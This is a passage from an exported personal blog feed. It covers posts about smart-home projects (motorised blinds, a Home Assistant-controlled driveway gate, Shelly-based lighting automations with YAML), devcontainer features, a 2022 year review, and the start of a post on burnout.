bill.\nThe Move is less appealing aesthetically as it’s quite a tall unit with buttons on the outside. It also didn’t have a solar panel, instead you need to rely on a wall plug or ensure you recharge the battery frequently. It also doesn’t have any HA integration that I have been able to find, which isn’t surprising as it’s a BLE device, meaning that it can only be controlled via the phone app or directly on the device. Because of this, I’m not installed it anywhere, maybe in the future if I feel the desire to reverse engineer the BLE comms from the app (but probably not…).\nThe last of the ones I was given was the Axis Gear, which is both BLE and ZigBee and while the BLE aspect doesn’t have HA integration, using ZigBee it can be, woo!\nTime to get integrating.\nThey All Kind of Suck After following all the install guides for both the Soma and Gear (although I mounted them with 3M sticky strips rather than screws incase I want to get rid of them) and the conclusion I came to is that the whole ecosystem just kind of sucks. Let’s start with the design of the control units.\nWhat I like about the Soma is that it’s small and sleek but the trade off from that is there’s no external controls… so how do you control it? via the companion mobile app. This means we’re going to be breaking one of our core rules, our blind isn’t going to be easy to control by just anyone.\nThe Gear is better in this regard, it has a modern design, which fits the look we’re going for, and a touch bar on the front that you can control the blind position, meaning you don’t need to open the app once it’s initially setup to control the blind. It’s not perfect, you still need to know to look for the touch bar and if the blind is closed you have to reach around it to get to the controller, but it’s an improvement over the Soma… it sucks less.\nApps Both of these options require you to use BLE for the initial setup (the Axis Gear is ZigBee but it doesn’t support setting positions via ZigBee, it’s either via the app or using magic button combinations) and of course they have their own apps, which means I have two different apps to control my blinds.\nAnd this is the biggest pain point with motorised blinds, you either have to buy into a single platform or you end up with a range of apps that you’re controlling via. Long-term, this is likely to be less of a problem as you will find the one that works for you and go “all in” with that one, but while you’re investigating it sucks, and you’re either spending money on devices to mothball them later, or you don’t replace the less-desirable ones and suck it up.\nNeither of the apps are terrible, they find the blind easily enough, you can set positions, control the position, set schedules, etc. but really what I want is a single platform to control them all.\nEnter Home Assistant.\nHome Assistant Once the units were setup it was time to integrate them with Home Assistant. I started with the Soma as there’s a Soma Connect HA integration, awesome… no, no it wasn’t.\nTurns out that you don’t integrate the blinds directly, instead you need a Soma Connect hub to bridge the blinds into Home Assistant. Well that sucks.\nIt kind of makes sense. Up until recently there wasn’t native Bluetooth support in HA, so it couldn’t talk to the blinds, the Soma Connect does that and HA talks to it. But it meant that I would have to spend more for a device that only kind of fits what I want.\nThankfully, while digging around the Home Assistant forums I found out that the Soma Connect software can be installed on a Raspberry Pi (seemingly they were having supply issues with the official devices so the software was released). I’ve got a stack of Pi’s laying around, so I dusted one off, flashed an SD card with the Soma Connect software, booted it up and it just worked. Seriously, it just worked! Home Assistant picked it up, it’d already found the blind and connected with it, I was actually kind of shocked. So now I have a Pi that lives under the bed that is controlling one of the blinds.\nThe Gear is different in that it supports ZigBee and while their docs assume you’re using something like a SmartThings or Alexa as the ZigBee hub, I had no problems finding it using my ConBee II stick that is my ZigBee hub. You have to use the Axis app to enable “hub mode” (which then renders the app useless as I guess they disable BLE? seems odd that you can’t use both) and once that was done I found it to pair pretty quickly with my network and it appeared in Home Assistant as a cover entity so it can be opened/stopped/closed.\nSince I have both the Soma and Gear in our bedroom (and still two manual blinds… which we never open now 🤣) I created a cover group so we have a single entity in HA for “Parents blinds” that we can open/close them all at once.\nFor automations, they aren’t very exciting, at 9am the blinds will open and at 7pm they’ll close. I’m thinking of getting a humidity sensor in the bathroom to detect when the shower is on and close the blinds, since you have to walk past them to get to our walk in robe, but it’s pretty rare that we’re not done in the bathroom by 9am anyway (plus - gotta give the neighbours a show every now and then 😉).\nRandomly Failing Every now and then the blinds don’t work. Most of the time it’s the Soma that fails to respond so we’ll find the blinds still open when going to bed (annoying) or it just never opened (less annoying), meaning I either yell at the Google Home to trigger the blind or get out my phone and use the HA app. I haven’t dug into logs to work out what might be the problem, instead I may just add an automation that checks if the blind didn’t open/close to then rerun the command.\nI managed to pick up two more Axis Gear’s for the kids bedrooms and it took about three months to get them working. I mounted them on the wall but they weren’t being detected in the Axis app. Thinking they might be DOA I used a Bluetooth packet sniffing app and found that they were broadcasting on Bluetooth when being put into pairing mode, it was just my phone that couldn’t find them. I contacted Axis support, and after a lot of back and forth (yay timezones and holidays - was about six weeks of back and forth!) they concluded that they were probably on a really outdated firmware and the Android app can’t find it, instead I’d need to try the iOS app… but I don’t have any iOS devices… so I had to wait until we had someone over with an iPhone who was willing to let me install stuff on their phone (I don’t get why but apparently the iOS app can detect a wider range of firmware versions or something). I managed to find a victim volunteer and the Gear’s appeared immediately in the iOS app, I upgraded their firmware and then they connected to the Android app. I was then able to enable smart home mode and bring them into my ZigBee network (the fact I have to use the app for that is annoying, because if the app ever gets removed from the store I’m stuffed), well, one of them works and one of them doesn’t. I’ve got one that I need to keep trying to pair as it’s reporting that it’s connected but it fails to respond to commands (at least it can be manually controlled via the touch bar).\nFinal Thoughts We’ve now got four blinds operating across two different ecosystems and the conclusion I’ve drawn on motorised blinds is that this is a space that’s not approachable to the average home owner.\nWhen they work, they are great, in the morning one of our kids blinds opens and it’ll close again at night, the other doesn’t without manual control and it’s going to take me a while to work out the fix for it (and it might mean I have to buy more ZigBee routes as the network might be too stretched for it).\nAnd the price-point makes it very hard to get into, you either have to be willing to invest a few hundred dollars and accept that some of that will be a lost investment, or you have to hope you back a winner first time.\nSoma Smart Shades 2 As I said, these were one of the top contenders for me when I first started researching motorised blinds but having used them, they aren’t for me.\nWhile I thought the lack of external buttons would be great as it meant a smaller, sleeker unit, it fails the family test - there’s no way to control it without the app. Combine this with the need for a hub to bring it into HA (or have any remote control), the cost starts to blow out.\nAdd on top that it randomly just doesn’t respond when it should so it’s off the list of future investments. I probably won’t remove it, at least not for the time being as I don’t have an alternative device, so instead I’ll have to work around the problem with more software solutions.\nAxis Gear I have mixed feelings about this device. I like the design of it, how easy it is to use and that it integrates easily (well, easily-ish) into my ZigBee network. But when it doesn’t work, it’s a real pain. While writing this I noticed that both of the kids blinds failed to close tonight, one is reporting unavailable and the other is saying the battery is flat (despite the solar panel being plugged in). I think my ZigBee network is too thin at that part of the house so I may need another router, and I’ll have to dig into a battery problem goes off to find the multimeter to test 12 AA batteries.\nBut the most frustrating part is they are no longer in production! The company has made a new device, Ryse, which I don’t think looks as good. It’s also dropped ZigBee support and the solar panel, meaning that you either need to have a wall socket nearby or buy their battery pack plus their hub, which doesn’t seem to have HA support anyway.\nYay, another dead end.\nWrapping Up Motorised blinds really appealed to me initially, but now having tried them out I’m rather… whelmed. I’m not overwhelmed by them nor am I underwhelmed, I’m just… whelmed.\nMaybe the ones that go into the blind itself rather than control the chain are a better investment, but with an entry price of around $200 per blind, that’s a heavy investment to do our whole house.\nSo, should you add it to your smart home priority list? Well, it depends how much money and effort you’re willing to invest in experimenting. Be warned, at one point I was using Wireshark to debug a BLE traffic dump… yeah, it got rough (I didn’t end up needing to do that, hence I didn’t mention it before).\n", "id": "2023-02-03-building-a-smart-home---part-8-motorised-blinds" }, { "title": "Building a Smart Home - Part 7 Motorised Gate", "url": "https://www.aaron-powell.com/posts/2023-01-16-building-a-smart-home---part-7-motorised-gate/", "date": "Mon, 16 Jan 2023 09:51:16 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "We installed a motorised gate, so guess what, I need to automate it!", "content": "In building our new house we decided to add a motorised gate across our driveway.\nUnsurprisingly, this is a gate running off a remote, which upon first inspection I believed is using RF on some frequency, and this sounds like it’s something I can automate with Home Assistant! After all, I’ve previously done some RF automations, so let’s get started.\nThe Controller The control unit we have installed is the BFT Deimos BT A 400 which connects to the gate via a rack and pinion system with rack being on the gate and the pinion the motor. It has a sensor on the motor that is triggered when the gate reaches the open/close positions and stops the motor. This all runs on a track on our driveway, ensuring that it doesn’t, you know, go where it’s not meant to go.\nSo in reality, it’s a pretty simple system and sounds like a good fun thing to automate.\nAutomating the Gate With the gate we were provided with some Mitto remotes and going through the docs, they broadcast on 433MHz and that’s the same as the Broadlink RM4 Pro which I have controlling the ceiling fans.\nThe only problem is that now I need it to reach yet another location, and it’s already running a bit thin in reaching the full length of our house.\nBut it turns out that it’s actually a lot simpler than that. Part of the gate controller is the Hamal control board and it has some interesting headers on the board, a 24v DC +/-, as well as headers for external controllers to do things like start the motor. This sounds like a better option, it’s direct input to the motor, so we can send a signal directly, rather than relying on an external signal blast.\nWiring up the Controller I’ve still got some Shelly 1 devices left over from the lighting install, and this is the ideal device to use as it can run on 240v AC or 24v DC, and the motor exposes positive and negative headers for 24v DC (as well as 240v AC, but you don’t want to play with 240v AC!).\nAfter unplugging the motor I grabbed spare wires to connect the L and N terminals to the 24v DC headers and the Shelly is ready to power on, next we need to wire up the IO of the Shelly to the headers 61 and 60 respectively.\nI’m not using the SW header on the Shelly as I don’t have an external input to control the relay switching.\nWith power connected back to the controller the Shelly broadcast its AP and was ready to be adopted onto the wifi network, sweet!\nShelly Configuration For this Shelly, it’s not a switch like you’d use in lighting, it’s just activating momentarily to trigger the motor to start doing its thing, so the concept of on and off don’t really make sense. Instead, we’ll configure this Shelly as a Momentary Button Type, but since we never want it to be in the on state for long, I added an Auto Off timer with a 1s delay, meaning that once the relay turns on it then turns off again straight away.\nThis is a simple trick to work around how these style of controllers work, on just tells the motor to start doing what it should be doing based off what it’s currently doing/current state is; if the gate is open, it’ll close; if it’s closed, it’ll open; if it’s moving, it’ll stop.\nLooking at the headers Hamal control board I think you could do something smarter, but that’s not really of concern to me.\nAdding to Home Assistant Home Assistant will find the Shelly as soon as it’s on the network and it can be integrated easily, but we just have it as a switch, and a switch that pretty much always says it’s turned off. What we’re lacking is a way to know if the gate is opened or closed, and to do that we’ll add a contact sensor.\nI used the Aqara Door Sensor (again, I have a bunch laying around from other projects… this seems to be a smart home trend 😅) which I’ve attached between the gate and the pole the gate is on, so it’s somewhat hidden and protected from the elements.\nOnce adopted on my ZigBee network I have something that reports open/close state of the gate, so we can bring it all together.\nAdding a Cover Template Entity To merge the two entities, our contact sensor and switch, to represent something that can do open/close/stop, we’ll use a Template Cover entity. Here’s the YAML for the gate:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 cover: platform: template covers: roller_gate: device_class: gate friendly_name: "Roller gate" value_template: >- {% if is_state('binary_sensor.driveway_gate_contact','on') %} Open {% else %} Closed {% endif %} open_cover: service: switch.turn_on data: entity_id: switch.roller_gate close_cover: service: switch.turn_on data: entity_id: switch.roller_gate stop_cover: service: switch.turn_on data: entity_id: switch.roller_gate icon_template: >- {% if is_state('binary_sensor.driveway_gate_contact','on') %} mdi:gate-open {% else %} mdi:gate {% endif %} The entity configuration is reasonably straightforward, to open/close/stop we use the switch.turn_on service in Home Assistant, which triggers our Shelly to on, forcing an action, before it turns itself off again. We then determine current state by looking at the contact sensor entity and reporting the right text (and icon for good measure).\nThere we go, it’s appearing in Home Assistant and we can trigger it to watch magic happen.\nConclusion This turned out to be a reasonably easy project to undertake because the BFT controller is well designed for integrating an external controller in. I hadn’t seen this exact approach done, the Home Assistant forums had this post that used another component of the BFT product line that I don’t have, but it was enough to help me get started.\nIt’s also very similar to wiring up a garage motor, which I’ve done in the past (and there are plenty of tutorials online for).\nIs this really that useful though? Presently, no, not really. I don’t really have anything that will intelligently decide if the gate needs to be opened or closed, so it’s more a case of “I can do this” than anything else. Sure, there’s a basic automation it’s used with to make sure it’s closed at the end of the day, but really, that’s not running that frequently as we just close it from the remote in the car. Maybe if/when we have a car that’s integrated into Home Assistant (our car isn’t modern enough for that) there could be some smarts on “you’re about to drive, let me open” and have auto close when away/reopen on approach, but that’s not going to be happening for a while.\nAll in all, it was a fun project that saw a few fist pumps when I realised that it worked first time!\n", "id": "2023-01-16-building-a-smart-home---part-7-motorised-gate" }, { "title": "Simplifying devcontainers With Features", "url": "https://www.aaron-powell.com/posts/2023-01-11-simplifying-devcontainers-with-features/", "date": "Wed, 11 Jan 2023 04:36:59 +0000", "tags": [ "vscode" ], "description": "Sometimes we want to add things to a devcontainer, but how do we do that in the simplest way", "content": "As much as I love using devcontainers for all my local development (see here) there’s often repeatable things that I want to do in them which means I go back and copy RUN steps from previous Dockerfiles that I’ve created.\nEnter devcontainer Features A few months ago a new proposal was added to the open dev container spec (the spec that supports devcontainers in vscode) for custom features.\nFeatures are predefined scripts that you can add to your devcontainer.json file that will add something to the base image or existing Dockerfile that you are using for a devcontainer. By doing this, you simplify the base that you’re starting from and avoid a situation where you are having to add development tooling to what could be a shared image across environments.\nUsing Features for my blog The repo that my blog lives in has had a devcontainer definition for nearly two years (see!), and in that time I’ve maintained a Dockerfile that uses the base image and a devcontainer.json file that describes how to use it within VS Code.\nOver time I’ve added some more to the RUN command in the Dockerfile that installed more default installs, and it just kind of did it’s thing.\nToday though, I decided to port it across to using Features, and you’ll find the commit here.\nThe primary changes in the commit are moving away from maintaining a Dockerfile myself to using a generic base image, mcr.microsoft.com/devcontainers/base:bullseye to be precise, and adding the following Features:\n1 2 3 4 5 6 7 8 9 "features": { "ghcr.io/devcontainers/features/github-cli:1": {}, "ghcr.io/devcontainers/features/hugo:1": {}, "ghcr.io/devcontainers/features/node:1": {}, "ghcr.io/devcontainers/features/dotnet:1": { "version": "lts" }, "ghcr.io/jlaundry/devcontainer-features/azure-functions-core-tools:1": {} } Now when the container is rebuilt it’ll use the generic base image before layering on the features that I need, making it a clearer view of what has been modified in the container that I’m developing in.\nConclusion While my blog might be a reasonably trivial place to have a complex devcontainer, I see that using Features is a really simple way to reduce the complexity of the local container setup. It would be quite possible to reuse the Dockerfile that defines your production infrastructure and then layer some Features over that, allowing it to be used for both local development and production deployments, without the risk of developer tooling leaking out.\nThe other added bonus is that you can define your own Features and use them within your organisations repos. Check out the docs for insights on writing your own (it can be as simple as a JSON file and bash script!).\n", "id": "2023-01-11-simplifying-devcontainers-with-features" }, { "title": "2022 a Year in Review", "url": "https://www.aaron-powell.com/posts/2023-01-11-2022-a-year-in-review/", "date": "Wed, 11 Jan 2023 00:04:53 +0000", "tags": [ "year-review" ], "description": "A look back at the year that was", "content": "Would you look at that, 1 year to the day since I did my 2021 post so I’m consistently late, woo!\nBlogging Towards the end of last year I read this post by Scott Hanselman about his decreased blogging, and it really resonated with me and how I’ve been feeling about blogging. While I haven’t blogged for quite as long, my oldest post is from 2008 (but it’s not actually my oldest, I’m missing some of my earliest stuff due to sloppy migrations), I have tried to be consistent but it’s fallen away over the last few years.\nIn 2022 I wrote 27 posts, which is close to as many as 2021 and some similarities in the content, such as a continuation of my GraphQL on Azure series.\nI also kicked off a new series about my smart home journey, which will continue throughout this year as I keep dabbling with stuff.\nPresenting In person conferences were back! 🥳\nI was fortunate enough to present at three in person events this year, NDC Melbourne on VS Code and GraphQL with TypeScript (although that talk had some awesome demo failures 😅), DDD Perth about VS Code (yes, same talk as NDC Melbourne, nothing wrong with reusing the classics!), and NDC Sydney Remix and why to use GraphQL (those talks aren’t online yet).\nThere was a smattering of virtual talks as well at various user groups and online events, but I’m really glad to be back in person and able to connect with the community that way. Although I must admit, I had forgotten just how exhausting in-person events were, by the end of a multi-day in-person event, I’m very much ready for a rest!\nI’m hoping that we continue to see events coming back in 2023, I’ve already got a few locked in and am hoping to see some more user groups come back as well.\nBuilding a house We finally finished building the house we started in 2021, well by we I mean the building company we contracted, and moved in at the middle of the year. While for us it seemed like it was taking foreverrrrrrrrrrr it ran on time and shockingly on budget.\nIt’s nice to be settled back into our own space, I now have my own purpose-built office (with a giant 1.8m by 1.7m floor plan 😅), the kids have their own areas to play in and most importantly, I can tinker with smart home stuff!\nAs I said before, I’m blogging about my smart home but the blog is somewhat a trailing indicator to where we’re really at. Other things that I have integrated but yet to blog about is climate control with our connected HA, our digital door lock, and our garage door + automatic gate. So stay tuned, there’s more coming in that space.\nBurning out The big thing for me in 2022 was burning out and then coming to grips with having done that. I wrote about being burn out last week and the response that I got from the post was really heartwarming. So many people reached out both publicly and privately to check if I was ok, to share that they’ve been experiencing the same, and to offer support.\nSeveral people have told me that they found it really brave of me to share such a vulnerability in such a public way, but I really don’t see it like that, I’m just someone who is lucky enough to have a bit of a platform and if I can’t use it to destigmatise mental health issues, then what’s the point?\nMoving to something new As I was coming to grips with my burnout and looking at what I wanted to change to help me work through it, I realised that it was time to tackle some new challenges, and I’m excited to announce that that will be happening in 2023. Don’t worry, I’m not going far, I’m moving from the JavaScript team to the .NET team within Cloud Advocacy. This feels like a better fit for me, as much as I love JavaScript, .NET is where my heart always has been and I’m looking forward to tackling some of the challenges facing .NET developers in regards to Azure.\nBut yes, I do appreciate the irony that in my burnout post I talked about having a lot of managers to then go and have yet another manager come 2023, but I have already congratulated my new manager on the promotion they’ll receive in about 5 months time! 🤣\nBring on 2023!\n", "id": "2023-01-11-2022-a-year-in-review" }, { "title": "Building a Smart Home - Part 6 Lighting", "url": "https://www.aaron-powell.com/posts/2023-01-05-building-a-smart-home---part-6-lighting/", "date": "Thu, 05 Jan 2023 05:32:32 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "It's time to get to the thing most people associate with a smart home, lights.", "content": "When we got our new house built, we decided to hold off putting in feature lights because we wanted to see the space first and then decide what we wanted in each of the areas as features. Fast forward a few months of occupancy and we’d selected our feature lights and booked the electrician to come and install them. And since we had an electrician coming to do some work, I felt it was an opportune time to get onto the next smart home job - lighting.\nNote: In Australia it’s illegal for anyone other than a licensed electrician to work on electrical wiring. Because I’m not a licensed electrician I won’t explain how the wiring is done, just what I’m doing once it is done.\nSmart light bulbs I dislike smart light bulbs for the most part because they rely on a powered circuit to work, which means that a wall switch will turn them off and you can’t use them in automations or for anything smart until you turn the switch back on. Because of this, I’ve actively avoided them in all but two places - our kids lamps. The kids lamps are in their rooms and I decided to get them smart bulbs so they can use the lamps as night light, or to have them do fun colours when they have friends over if the want. I got WiZ LED bulbs from Bunnings because they have an integration for Home Assistant out of the box. The one in my eldest’s room works pretty much flawlessly, whereas the one in my youngest’s room drops from the wifi network constantly (I’ve put an automation in place that sends me a push notification when it goes offline so I can reboot it - and yes, it has a static IP, I think it’s just a dodgy device).\nMaking dumb lights smart Keeping true to my ethos of Human Centred Design, we have to make the lights work for everyone, not just the household techy. Also, since we just built the house, and decided to get some nice quality light switches everywhere, I didn’t want to replace everything with the “futuristic” smart switches - I like the tactile feedback of flipping the switch, so that needs to keep working (not to mention people expect switch to work a certain way - hence the Human Centred Design bit).\nTo make the lights “smart” I decided to go with Shelly smart relays.\nI went with Shelly devices because I know a lot of folks already using them and they have great integration with Home Assistant. I picked up a deal via Oz Smart Things and got a bunch of Shelly 1 and 2.5 devices. We’ve got everything from a single switch to quad plates, so I need a range of devices. In hindsight, I should have gotten the 1PM instead of the 1 so that I’d get the power monitoring (the 2.5 have it), but really, it’s not that important.\nThe way the Shelly devices work is they sit between the switch and the light (or whatever is on the circuit) and when the switch is flipped you can control what the relay does. The simplest mode is to just change the state of the relay, so when the switch is flipped the relay turns on or off and the light turns on or off. Great, this solves the most basic UX aspect - the switch still works, but it gives the added benefit that I can also yell at the Google Assistants around the house to turn lights off.\nWhich Shelly mode to use There are two main settings that I tweak with my Shelly devices, the Power On Default Mode and Button Type.\nFor the Power On Default Mode I’ve set the switches all to be Restore Last Mode. This means that in the event of a power outage the state of the light will be restored to what it was when the power went out, so if it’s the middle of the night, we won’t all be suddenly woken up because the lights came on. You could alternatively use the SWITCH mode, but that will then rely on the position of the switch to dictate what the relay does, and since we don’t always use the switches to turn on/off the lights, you could end up in a situation where the lights come on unexpectedly.\nFor the Button Type, I originally set them to Toggle Switch, but that can see states getting out of sync, especially if you remotely change the relay state - now the switch and relay don’t match so you have to flip the switch to get it back to the right state (which is annoying and would likely cause confusion). Instead, I use the Edge Switch button type, which means that every flip of the switch changes the state, regardless of whether the switch is in the “on” or “off” positions (basically we don’t have “on” or “off” anymore on the switches).\nBut for a few of the devices I have set them to Detached Switch for the Button Type and this disconnects the switch from the relay, meaning that when the switch changes state, the relay doesn’t change state, you have to do something entirely “programmatically” now, and this comes to the automation’s.\nAutomations As “fun” as it is to be able to yell at the house and have a light turn on or off, the real reason I put the Shelly’s in was to be able to do some automations with them, so let me share some of the ones I’ve setup and that seem useful (and that my wife also finds useful!). So far they are all pretty basic, but they are tackling the little improvements to life that I want out of a smart home.\nAutomatic lights in storage We have a storage room under our stairs, very Harry Potter esq, and it’s got a light in there as there’s no window. We’d constantly be forgetting to turn the light off when closing the door, so a period of time later one of us would notice a faint glow under the door and turn it off. Not a major inconvenience or anything, but it’s one of those little things that would be nice to not have to think about.\nThe idea for this automation is that when the door is opened, the light turns on, and when the door is closed, the light turns off (with a little delay). To know when the door is opened I attached an Aqara Door Sensor to the top of the door. Now, when the door is opened, the sensor triggers and we can run an automation:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 alias: "Lighting: Storage" description: "" trigger: - platform: state entity_id: - binary_sensor.storage_door_contact to: "off" for: hours: 0 minutes: 0 seconds: 30 - platform: state entity_id: - binary_sensor.storage_door_contact to: "on" condition: [] action: - service: light.turn_{{ trigger.to_state.state }} entity_id: light.understairs mode: single Rather than having two automations, one for “open” and one for “close”, I combine them in a single automation and use the state of the contact sensor to call the appropriate light service in Home Assistant. I also added a delay on the door close of 30s so that if you close and then immediately need to go back in, you won’t be running the automation constantly.\nI use a similar automation to this for the garage internal door, with the additional condition that it only runs if the roller door is closed or it’s night time, as otherwise we don’t really need the additional lighting.\nMedia room lights For the media room I’ve setup an automation that when you pause (or stop) what’s playing on the TV it will turn the light on:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 alias: "Lighting: Media room on pause" description: "" trigger: - platform: state entity_id: - media_player.media_room_tv to: paused for: hours: 0 minutes: 0 seconds: 5 - platform: state entity_id: - media_player.media_room_tv to: "off" for: hours: 0 minutes: 0 seconds: 5 condition: - condition: state entity_id: light.media_room_light state: "off" - condition: state entity_id: light.media_room_downlights state: "off" action: - service: light.turn_on data: {} target: entity_id: light.media_room_downlights mode: single The idea behind this is that if you’ve paused what you’re watching, it’s likely that you’re about to get up anyway so bringing the light on means you can see where you’re going. I also added a 5s delay to try and catch some of the edge cases when swapping shows. I also added a condition to check that the lights are off, since there’s no reason to turn a light on if there is already a light on.\nThis automation isn’t perfect as it can be a bit aggressive in turning the lights on if you’ve moving from one streaming provider to another, or swapping from watching something to playing Xbox, but it’s better than nothing and I just need to do some debugging on the various states the TV reports to HA.\nLighting in the parents bedroom No, not that kind of lighting, I’m waiting for the LED strips to come… I’ve said too much 😳.\nSomething that often annoys me about bedroom lighting is that the light switch is near the door, but the bed is generally isn’t, so when you flip the lights off you walk across the room in the dark, hoping you don’t stub your toe on the end of the bed. Sure, you could install additional switches or turn on a lamp beforehand, but that’s not as “techy”.\nSo for the Shelly that’s controlling these lights I’ve set the Button Type to Detached Switch. Using this mode means you need to enable the Input sensors in Home Assistant. My sensor list looks like this for the Shelly 2.5 that controls the two sets of lights in our bedroom:\nNow the switches will change the state of the Input sensor, but that doesn’t change the relay, so the switch does nothing. Instead we need an automation to be triggered on the state change to the Input that will either turn the light on or will put a 10s delay before turning the light off. I’ve also configured this delay to only be for after 9pm, so in the morning or other times, the lights will toggle immediately when the switch is flipped.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 alias: "Lighting: Toggle parents light on switch change" description: "" trigger: - platform: state entity_id: - binary_sensor.parents_bedroom_channel_1_input - binary_sensor.parents_bedroom_channel_2_input condition: [] action: - if: - condition: template value_template: {{ is_state(light, 'on') }} then: - if: - condition: time after: "21:00:00" then: - delay: hours: 0 minutes: 0 seconds: 10 milliseconds: 0 - service: light.turn_off target: entity_id: "{{ light }}" else: - service: light.turn_on target: entity_id: "{{ light }}" mode: single variables: light: >- {{ 'light.parents_fan' if trigger.entity_id == 'binary_sensor.parents_bedroom_channel_1_input' else 'light.parents_downlights' }} It’s a bit of a clunky automation because I have nested if actions, but I’ve not thought of a better way to inject the 10s delay conditionally like this.\nInitially, my wife thought this automation was a total gimmick, but she’s come to find it really useful, as her side of the bed is the one furthest from the door (and she’s the one most likely to leave clothes on the floor 😝).\nMaking our ceiling fans smarter Earlier in this series I wrote about making the ceiling fans smatter but there was one fundamental flaw in the design - the wall switch would cut power to the circuit, turning the light off, but also turning the fan off. It also meant that if we’d turned the light off using a voice command or automation, the switch couldn’t be used to turn it back on. Since I implemented this design, the family, including the kids, are mostly trained on how it works, but sometimes there’d be shouting at Google to turn the light on, nothing happening and then shouting at me to fix it 🤣 (which generally involved flipping the switch so the circuit was powered again).\nI wanted to fix this, and I’ve been able to do this with the use of a Shelly in Detached Switch mode and an automation.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 alias: "Lighting: Kids fan light switch toggle" description: "" trigger: - platform: state entity_id: - binary_sensor.kid_1_room_input - binary_sensor.kid_2_room_input condition: [] action: - if: - condition: template value_template: | {{ is_state(light, 'on') }} then: - if: - condition: time after: "18:45:00" then: - service: light.turn_on data: effect: Night Light target: entity_id: "{{ lamp }}" else: - service: light.turn_off target: entity_id: "{{ light }}" else: - service: light.turn_off target: entity_id: "{{ light }}" mode: single variables: light: >- {{ 'light.kid1_fan' if trigger.entity_id == 'binary_sensor.kid_1_room_input' else 'light.kid2_fan' }} lamp: >- {{ 'light.kid1_lamp' if trigger.entity_id == 'binary_sensor.kid_1_room_input' else 'light.kid2_lamp' }} This automation is a bit more complex as it’s really doing two jobs - changing the state of the fan light, but also conditionally turning on their lamp with the Night Light effect.\nWhen the switch is flipped, we determine if the fan light is currently on or off using the value_template on the if action, looking up to the variable light which is set based on the trigger.entity_id (the ID of the sensor that changed state). If the light is on, we then check the time to see if it’s after 6:45pm, and if it is, we turn on the lamp with the Night Light effect before turning the fan light off. If the fan light is off, we just turn it on.\nIn my first pass of this I had it calling the script that I use to do the RF blast, but then I was getting weird states when HA would think the light was on when it was actually off, because state was tracked weirdly, but since I created a Template Entity for the lights, we can just use the built-in light.turn_on and light.turn_off services, which will in turn call the scripts, so HA tracks it properly.\nAnd with this design we never actually turn the relay off, so the circuit is always powered, the fan can be run through automations (or voice commands) at any time, and the switch can be used to turn the light on and off as expected.\nI will add that there are occasions that this does fall over, sometimes the Broadlink fails to send the command and then HA thinks the light is off when it isn’t really, so then I have to get into HA, turn it off on the Shelly, fake turning the light off in HA to fix the state sync and then turn the Shelly back on. I can probably fix this with a better placement of the Broadlink device, but it happens infrequently enough that I’m not overly stressed.\nConclusion There’s a few other automations that I have setup for the lights, such as one that will turn all lights off when we go to bed, one to turn on the front porch light when we’re out after dark, but they’re not that interesting.\nI stand by my perspective that smart light bulbs, whether they are wifi, ZigBee, Z-Wave, BLE or other, they really require something additional in the circuit, so they best suited for special situations, in my case, lamps for our kids bedrooms.\nBut Shelly’s to control the lighting circuits, they’re great and work just as I need them to. I’ve only had one drop off the wifi network since installing and I had to issue a reconnect in the Unifi admin portal, but after that I issued them all with static IP addresses and haven’t had any problems.\nI’m really happy that I was able to fix the pain point with our fan lights, and now they work as expected (… mostly), which is definitely improving the Spousal Acceptance Factor!\nIn the future I’d like to add some presence and luminosity sensors in a few of the rooms so we can move away from needing the switches at all, just having the lights adjust to the needs of the room, but that’s a project for another day.\nThe Shelly 2.5’s have Power Monitoring in them and I’ve been contemplating if I could use that feature to work out if the light and fan is on/off, rather than manually tracking state in Home Assistant, but it’ll take a bit of exploring to see if it’s possible to work out the power draw when the light is on vs when the fan is on (and on at different speeds).\n", "id": "2023-01-05-building-a-smart-home---part-6-lighting" }, { "title": "Burnout", "url": "https://www.aaron-powell.com/posts/2023-01-03-burnout/", "date": "Tue, 03 Jan 2023 04:58:12 +0000", "tags": [ "career" ], "description": "2022 was a tough year", "content": "To say that 2022 was a tough year is probably an oversimplification of things, but yeah, 2022 was tough. And it’s not just the case that we’re a few years into a global pandemic for me, 2022 was tougher than that.\nTo put it simply, I’m burnt out.\nBy and large I’m a pretty upbeat and laid back person. I remember in high school my mum commenting that she didn’t think she’d ever seen me stressed about an assignment or exam. I mean, I didn’t get stressed about that stuff, because at the end of it, a bad grade was just a bad grade. I’d get over it and move on. I’d learn from it and do better next time. Sure, I wasn’t an A-student, I was a B-student, and that was good enough for me.\nAnd this is something that I’ve taken into my work life as well, don’t stress about the small stuff, there’s always something else to tackle and just keep the big picture in mind and you’ll be fine.\nBecause of this, I’ve always felt that I had a decent grasp on my mental health. I’ve never been diagnosed with anything, but I’ve always felt that I was in a good place mentally. I’ve never had any issues with depression or anxiety, and I’ve never had any issues with burnout.\nUntil now.\nAround and around we go 2022 started with me stepping down from leading the team I’m in at Microsoft and helping to onboard the new manager. While I wasn’t sad to be stepping down, it did hurt to have been unsuccessful in the application for the lead role, after all, it’s hard to not take the “no, you’re not cut out for this” personally.\nThe other thing that made this tough was that it meant yet another manager for me, and once I did the maths I realised that I had a manager retention rate of 5 months. I was just starting my 3rd year at Microsoft and I was already on like my 7th manager. I mean, I’m not going to lie, it’s a bit demoralising to have to keep explaining to new managers what my objectives are, what I’m working on, and what I’m trying to achieve. I even jokingly made the comment to my manager that “we’ll review in 5 months”.\nWell, guess what happened in 5 months? I got another new manager.\nQuick aside - my manager was promoted to fill a role that was vacated by someone who left the company, so they actually became my “skip” (my managers manager) and my new manager was managing a sibling team, they just had their role expanded to also cover the JavaScript team, so it was a complete upheaval.\nAnd this is where things started to get tough.\nHere we go again.\nWith this being my 8th manager in 3.5 years, I’m pretty numbed to the change and it’s been getting harder to get back into the rhythm of things. We’re also going into a new FY, which means we’ve got a new set of objectives coming down, the team above Advocacy had been restructured so we are reporting closer to the CVP, so it’s a whole bunch of change that I just can’t get excited about.\nImpact, or lack there of In October I was doing my 6 monthly self-review (we call them Connects) 